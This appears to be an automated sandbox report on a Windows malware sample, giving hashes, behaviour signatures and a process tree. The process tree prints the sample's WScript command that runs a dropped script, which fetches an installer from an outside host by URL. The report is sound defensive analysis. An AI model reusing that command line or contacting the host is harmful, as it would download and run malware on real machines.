Analysis
-
max time kernel
185s -
max time network
194s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
28/11/2022, 05:09
Static task
static1
Behavioral task
behavioral1
Sample
ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe
Resource
win10v2004-20221111-en
General
-
Target
ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe
-
Size
184KB
-
MD5
298adbf57861300fbf94267d1eb76b03
-
SHA1
057cb878aa5b711bcc1f8865f897ae15c94effb0
-
SHA256
ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553
-
SHA512
17108688664bd63f44af81334c04c5eed5c6550b3159c4fdaccf2be3ce9eed9958ade54325786c77cb4eeb575a69c8592f326628ba903e8473bd8723a0c1b6af
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3i:/7BSH8zUB+nGESaaRvoB7FJNndnv
Malware Config
Signatures
-
Blocklisted process makes network request 10 IoCs
flow pid Process 27 1540 WScript.exe 28 1540 WScript.exe 34 2144 WScript.exe 36 2144 WScript.exe 56 2144 WScript.exe 71 2144 WScript.exe 79 2144 WScript.exe 81 968 WScript.exe 90 968 WScript.exe 96 968 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 34 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4656 wrote to memory of 1540 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 82 PID 4656 wrote to memory of 1540 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 82 PID 4656 wrote to memory of 1540 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 82 PID 4656 wrote to memory of 2144 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 83 PID 4656 wrote to memory of 2144 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 83 PID 4656 wrote to memory of 2144 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 83 PID 4656 wrote to memory of 968 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 92 PID 4656 wrote to memory of 968 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 92 PID 4656 wrote to memory of 968 4656 ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe"C:\Users\Admin\AppData\Local\Temp\ad26fe1309eee26284e1bca398affe2f9af206a4c680e410807f17535f361553.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2357.js" http://www.djapp.info/?domain=nLThYQVTym.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2357.exe2⤵
- Blocklisted process makes network request
PID:1540
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2357.js" http://www.djapp.info/?domain=nLThYQVTym.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2357.exe2⤵
- Blocklisted process makes network request
PID:2144
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2357.js" http://www.djapp.info/?domain=nLThYQVTym.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf2357.exe2⤵
- Blocklisted process makes network request
PID:968
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76